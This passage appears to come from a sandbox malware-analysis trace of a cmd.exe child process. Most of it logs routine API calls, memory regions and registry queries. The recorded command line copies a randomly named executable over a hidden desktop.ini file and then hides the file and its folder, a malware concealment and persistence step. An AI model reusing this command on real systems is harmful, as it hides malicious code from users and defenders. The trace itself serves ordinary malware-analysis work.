hFindFile=0x330ec0, lpFindFileData=0x14f31c | out: lpFindFileData=0x14f31c) returned 0 [0147.437] GetLastError () returned 0x12 [0147.437] FindClose (in: hFindFile=0x330ec0 | out: hFindFile=0x330ec0) returned 1 [0147.437] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0147.438] _close (_FileHandle=3) returned 0 [0147.438] _get_osfhandle (_FileHandle=1) returned 0x7 [0147.438] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0147.438] 
_get_osfhandle (_FileHandle=1) returned 0x7 [0147.438] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0147.439] _get_osfhandle (_FileHandle=0) returned 0x3 [0147.439] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0147.439] SetConsoleInputExeNameW () returned 0x1 [0147.439] GetConsoleOutputCP () returned 0x1b5 [0147.439] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0147.439] SetThreadUILanguage (LangId=0x0) returned 0x409 [0147.439] exit (_Code=0) Process: id = "214" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16ce0" os_pid = "0xb74" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 18277 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" 
Region: id = 18278 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 18279 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 18280 start_va = 0x130000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 18281 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 18282 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 18283 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 18284 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 18285 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 18286 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 18311 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 18312 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 18313 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 
region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 18314 start_va = 0x290000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 18315 start_va = 0x430000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 18316 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 18317 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 18318 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 18319 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 18320 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 18321 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 18322 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: 
"c:\\windows\\system32\\usp10.dll") Region: id = 18323 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 18324 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 18325 start_va = 0x440000 end_va = 0x507fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 18326 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 18327 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 18328 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 18329 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 18330 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 18331 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 18332 start_va = 0x510000 end_va = 0x610fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 18333 start_va = 0x620000 end_va = 0x121ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 18334 start_va = 0x1220000 end_va = 0x1382fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001220000" filename = "" Region: id = 18340 start_va = 0x1390000 end_va = 0x165efff entry_point = 0x1390000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 272 os_tid = 0xa5c [0147.384] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22f7cc | out: lpSystemTimeAsFileTime=0x22f7cc*(dwLowDateTime=0x91c8f540, dwHighDateTime=0x1d440a9)) [0147.384] GetCurrentProcessId () returned 0xb74 [0147.384] GetCurrentThreadId () returned 0xa5c [0147.384] GetTickCount () returned 0x2dca8 [0147.384] QueryPerformanceCounter (in: lpPerformanceCount=0x22f7c4 | out: lpPerformanceCount=0x22f7c4*=20417313314) returned 1 [0147.385] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0147.385] __set_app_type (_Type=0x1) [0147.385] __p__fmode () returned 0x76b331f4 [0147.385] __p__commode () returned 0x76b331fc [0147.385] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0147.385] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0147.385] GetCurrentThreadId () returned 0xa5c [0147.385] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa5c) returned 0x38 [0147.385] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0147.385] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0147.385] SetThreadUILanguage (LangId=0x0) returned 0x409 [0147.385] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0147.385] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x22f75c | out: 
phkResult=0x22f75c*=0x0) returned 0x2 [0147.385] VirtualQuery (in: lpAddress=0x22f793, lpBuffer=0x22f72c, dwLength=0x1c | out: lpBuffer=0x22f72c*(BaseAddress=0x22f000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0147.385] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x22f72c, dwLength=0x1c | out: lpBuffer=0x22f72c*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0147.385] VirtualQuery (in: lpAddress=0x131000, lpBuffer=0x22f72c, dwLength=0x1c | out: lpBuffer=0x22f72c*(BaseAddress=0x131000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0147.385] VirtualQuery (in: lpAddress=0x133000, lpBuffer=0x22f72c, dwLength=0x1c | out: lpBuffer=0x22f72c*(BaseAddress=0x133000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0147.386] VirtualQuery (in: lpAddress=0x230000, lpBuffer=0x22f72c, dwLength=0x1c | out: lpBuffer=0x22f72c*(BaseAddress=0x230000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x60000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0147.386] GetConsoleOutputCP () returned 0x1b5 [0147.386] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0147.386] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0147.386] _get_osfhandle (_FileHandle=1) returned 0x7 [0147.386] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0147.386] _get_osfhandle (_FileHandle=1) returned 0x7 [0147.386] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0147.386] _get_osfhandle (_FileHandle=1) returned 0x7 [0147.386] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0147.386] _get_osfhandle (_FileHandle=0) returned 0x3 
[0147.386] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0147.386] _get_osfhandle (_FileHandle=0) returned 0x3 [0147.386] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0147.387] GetEnvironmentStringsW () returned 0x2a0598* [0147.387] FreeEnvironmentStringsW (penv=0x2a0598) returned 1 [0147.387] GetEnvironmentStringsW () returned 0x2a0598* [0147.387] FreeEnvironmentStringsW (penv=0x2a0598) returned 1 [0147.387] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22e6cc | out: phkResult=0x22e6cc*=0x40) returned 0x0 [0147.387] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22e6d4, lpData=0x22e6d8, lpcbData=0x22e6d0*=0x1000 | out: lpType=0x22e6d4*=0x0, lpData=0x22e6d8*=0x48, lpcbData=0x22e6d0*=0x1000) returned 0x2 [0147.387] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22e6d4, lpData=0x22e6d8, lpcbData=0x22e6d0*=0x1000 | out: lpType=0x22e6d4*=0x4, lpData=0x22e6d8*=0x1, lpcbData=0x22e6d0*=0x4) returned 0x0 [0147.387] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22e6d4, lpData=0x22e6d8, lpcbData=0x22e6d0*=0x1000 | out: lpType=0x22e6d4*=0x0, lpData=0x22e6d8*=0x1, lpcbData=0x22e6d0*=0x1000) returned 0x2 [0147.387] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22e6d4, lpData=0x22e6d8, lpcbData=0x22e6d0*=0x1000 | out: lpType=0x22e6d4*=0x4, lpData=0x22e6d8*=0x0, lpcbData=0x22e6d0*=0x4) returned 0x0 [0147.387] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22e6d4, lpData=0x22e6d8, lpcbData=0x22e6d0*=0x1000 | out: lpType=0x22e6d4*=0x4, lpData=0x22e6d8*=0x40, lpcbData=0x22e6d0*=0x4) returned 0x0 [0147.387] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22e6d4, lpData=0x22e6d8, 
lpcbData=0x22e6d0*=0x1000 | out: lpType=0x22e6d4*=0x4, lpData=0x22e6d8*=0x40, lpcbData=0x22e6d0*=0x4) returned 0x0 [0147.387] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22e6d4, lpData=0x22e6d8, lpcbData=0x22e6d0*=0x1000 | out: lpType=0x22e6d4*=0x0, lpData=0x22e6d8*=0x40, lpcbData=0x22e6d0*=0x1000) returned 0x2 [0147.387] RegCloseKey (hKey=0x40) returned 0x0 [0147.387] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22e6cc | out: phkResult=0x22e6cc*=0x40) returned 0x0 [0147.387] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22e6d4, lpData=0x22e6d8, lpcbData=0x22e6d0*=0x1000 | out: lpType=0x22e6d4*=0x0, lpData=0x22e6d8*=0x40, lpcbData=0x22e6d0*=0x1000) returned 0x2 [0147.387] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22e6d4, lpData=0x22e6d8, lpcbData=0x22e6d0*=0x1000 | out: lpType=0x22e6d4*=0x4, lpData=0x22e6d8*=0x1, lpcbData=0x22e6d0*=0x4) returned 0x0 [0147.387] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22e6d4, lpData=0x22e6d8, lpcbData=0x22e6d0*=0x1000 | out: lpType=0x22e6d4*=0x0, lpData=0x22e6d8*=0x1, lpcbData=0x22e6d0*=0x1000) returned 0x2 [0147.387] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22e6d4, lpData=0x22e6d8, lpcbData=0x22e6d0*=0x1000 | out: lpType=0x22e6d4*=0x4, lpData=0x22e6d8*=0x0, lpcbData=0x22e6d0*=0x4) returned 0x0 [0147.387] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22e6d4, lpData=0x22e6d8, lpcbData=0x22e6d0*=0x1000 | out: lpType=0x22e6d4*=0x4, lpData=0x22e6d8*=0x9, lpcbData=0x22e6d0*=0x4) returned 0x0 [0147.387] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22e6d4, lpData=0x22e6d8, lpcbData=0x22e6d0*=0x1000 | out: lpType=0x22e6d4*=0x4, 
lpData=0x22e6d8*=0x9, lpcbData=0x22e6d0*=0x4) returned 0x0 [0147.388] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22e6d4, lpData=0x22e6d8, lpcbData=0x22e6d0*=0x1000 | out: lpType=0x22e6d4*=0x0, lpData=0x22e6d8*=0x9, lpcbData=0x22e6d0*=0x1000) returned 0x2 [0147.388] RegCloseKey (hKey=0x40) returned 0x0 [0147.388] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886376 [0147.388] srand (_Seed=0x5b886376) [0147.388] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\"" [0147.388] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\"" [0147.388] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0147.388] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2a1cf8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0147.388] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, 
nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0147.388] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0147.388] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0147.388] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0147.388] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0147.388] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0147.388] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0147.388] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0147.388] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0147.388] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0147.388] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0147.388] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0147.389] GetEnvironmentStringsW () returned 0x2a26e8* [0147.389] FreeEnvironmentStringsW (penv=0x2a26e8) returned 1 [0147.389] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0147.389] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0147.389] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0147.389] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0147.389] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0147.389] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0147.389] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0147.389] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0147.389] _wcsicmp (_String1="KEYS", _String2="RANDOM") 
returned -7 [0147.389] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0147.389] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x22f498 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0147.389] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x22f498, lpFilePart=0x22f494 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x22f494*="Desktop") returned 0x18 [0147.389] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0147.389] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x22f214 | out: lpFindFileData=0x22f214) returned 0x2a0d78 [0147.389] FindClose (in: hFindFile=0x2a0d78 | out: hFindFile=0x2a0d78) returned 1 [0147.389] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x22f214 | out: lpFindFileData=0x22f214) returned 0x2a0d78 [0147.390] FindClose (in: hFindFile=0x2a0d78 | out: hFindFile=0x2a0d78) returned 1 [0147.390] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x22f214 | out: lpFindFileData=0x22f214) returned 0x2a0d78 [0147.390] FindClose (in: hFindFile=0x2a0d78 | out: hFindFile=0x2a0d78) returned 1 [0147.390] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0147.390] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0147.390] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0147.390] GetEnvironmentStringsW () returned 0x2a0598* [0147.390] FreeEnvironmentStringsW (penv=0x2a0598) returned 1 [0147.390] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0147.390] GetConsoleOutputCP () returned 0x1b5 [0147.391] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: 
lpCPInfo=0x4a9e4260) returned 1 [0147.391] GetUserDefaultLCID () returned 0x409 [0147.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0147.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x22f5d8, cchData=128 | out: lpLCData="0") returned 2 [0147.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x22f5d8, cchData=128 | out: lpLCData="0") returned 2 [0147.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x22f5d8, cchData=128 | out: lpLCData="1") returned 2 [0147.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0147.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0147.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0147.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0147.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0147.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0147.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0147.391] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0147.391] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0147.391] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0147.391] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0147.392] GetConsoleTitleW (in: lpConsoleTitle=0x290b70, nSize=0x104 | out: 
lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0147.392] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0147.392] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0147.392] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0147.392] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0147.393] _wcsicmp (_String1="attrib", _String2=")") returned 56 [0147.393] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0147.393] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0147.393] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0147.393] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0147.393] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0147.393] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0147.396] _wcsicmp (_String1="del", _String2=")") returned 59 [0147.396] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0147.396] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0147.396] _wcsicmp (_String1="IF", _String2="del") returned 5 [0147.396] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0147.396] _wcsicmp (_String1="REM", _String2="del") returned 14 [0147.396] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0147.398] _wcsicmp (_String1="type", _String2=")") returned 75 [0147.398] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0147.398] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0147.398] _wcsicmp (_String1="IF", _String2="type") returned -11 [0147.398] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0147.398] _wcsicmp (_String1="REM", _String2="type") returned -2 [0147.398] _wcsicmp (_String1="REM/?", _String2="type") returned 